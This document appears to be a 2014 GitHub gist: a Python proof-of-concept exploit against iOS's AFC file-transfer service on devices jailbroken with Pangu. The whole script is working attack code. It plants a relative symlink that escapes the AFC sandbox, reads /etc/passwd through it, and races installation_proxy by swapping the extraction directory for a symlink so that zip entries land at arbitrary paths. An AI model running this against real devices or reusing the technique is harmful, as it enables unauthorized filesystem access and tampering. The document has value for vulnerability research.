@PythEch PythEch/pwn.py
Created Jul 1, 2014
#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from pymobiledevice.afc import AFCClient
from pymobiledevice.lockdown import LockdownClient
from zipfile import ZipFile
# THANKS evaders, uh and Pangu!
# On 7.1.1 jb, I CAN HAS SYMLINK TO / again.
# Open a lockdown session to the attached device and an AFC (file transfer)
# session on top of it. Every path handed to `afc` below is relative to the
# AFC service's root directory; nothing in this script checks return values.
lockdown = LockdownClient()
afc=AFCClient(lockdown)
# Create a six-level-deep directory, place a symlink inside it whose target is
# the relative path five levels up, then rename that link to the top of the
# AFC tree. A relative target is interpreted from wherever the link currently
# sits; the author's header comment states the result is a link to `/`.
afc.make_directory("Downloads/a/a/a/a/a/")
afc.make_link("../../../../../", "Downloads/a/a/a/a/a/.haxx")
afc.file_rename("Downloads/a/a/a/a/a/.haxx", ".haxx")
# Read-through check: fetch /etc/passwd via the link and write it to a local
# file named `passwd`. The original comment marks this as a joke ("j/k").
with open('passwd', 'wb') as f:
    f.write(afc.get_file_contents('.haxx/etc/passwd'))
# Build the archive that install_ipa_and_race() later hands to
# installation_proxy. Both entries are stored under absolute archive names;
# the local files `payload/hi` and `payload/bigfile` must already exist next
# to this script, otherwise ZipFile.write raises.
with ZipFile('pwned.zip', 'w') as payload:
    payload.write('payload/hi', '/var/mobile/Preferences/hi')
    payload.write('payload/bigfile', '/var/tmp/bigfile')
def get_staging():
    # Return the name of the first entry in .haxx/tmp/ that starts with
    # "install_staging" (presumably the directory the installer unpacks into;
    # see the `foo_extracted` path built in install_ipa_and_race). Reads the
    # module-level `afc` session.
    # NOTE(review): when no such entry exists the function calls itself again
    # at once, with no delay and no retry cap, so a staging directory that never
    # appears ends in a recursion-limit error rather than a timeout.
    try:
        return next(x for x in afc.read_directory(".haxx/tmp/") if x.startswith("install_staging"))
    except StopIteration:
        return get_staging()
def install_ipa_and_race():
    # Upload the local archive to the AFC share, ask installation_proxy to
    # install it, and while that install is in flight replace the extracted
    # directory with a symlink. Retries itself until `bigfile` appears in
    # .haxx/tmp/. Uses the module-level `afc` and `lockdown` sessions.
    # NOTE(review): the local file handle opened here is never closed (no
    # `with`), so each retry leaks one descriptor.
    afc.set_file_contents("/pwned.zip", open("pwned.zip",'rb').read())
    mci = lockdown.startService("com.apple.mobile.installation_proxy")
    mci.sendPlist({
        'Command': 'Install',
        'PackagePath': "pwned.zip"
    })
    # get_staging() only returns once an install_staging* entry exists, so the
    # path is built after the installer has started unpacking.
    staging = ".haxx/tmp/%s/foo_extracted" % get_staging()
    # Move the real extracted directory aside and put a symlink three levels up
    # in its place. The `.old` directory is never removed by this script.
    afc.file_rename(staging, staging+".old")
    afc.make_link("../../../", staging)
    # Drain installation_proxy response plists until the stream ends or one
    # carries an 'Error' key; the error contents are neither logged nor raised.
    while 1:
        z = mci.recvPlist()
        if not z or z.get('Error'):
            break
    # Success marker: the archive entry stored as /var/tmp/bigfile is expected
    # to show up under .haxx/tmp/ (inferred from the archive built above). On
    # failure, recurse with no limit on the number of attempts.
    if "bigfile" not in afc.read_directory(".haxx/tmp/"):
        print "Unsuccessful"  # Python 2 print statement
        install_ipa_and_race()
# Run the attempt (it retries internally until bigfile appears), then clean up.
install_ipa_and_race()
print "Done!"  # Python 2 print statement
# Only the marker file is removed. The `.haxx` link, the Downloads/a/... tree,
# the uploaded /pwned.zip, the renamed `.old` staging directory and the local
# `passwd` copy are all left in place.
afc.file_remove('.haxx/tmp/bigfile')
# Python 2: block until Enter is pressed before the script exits.
raw_input()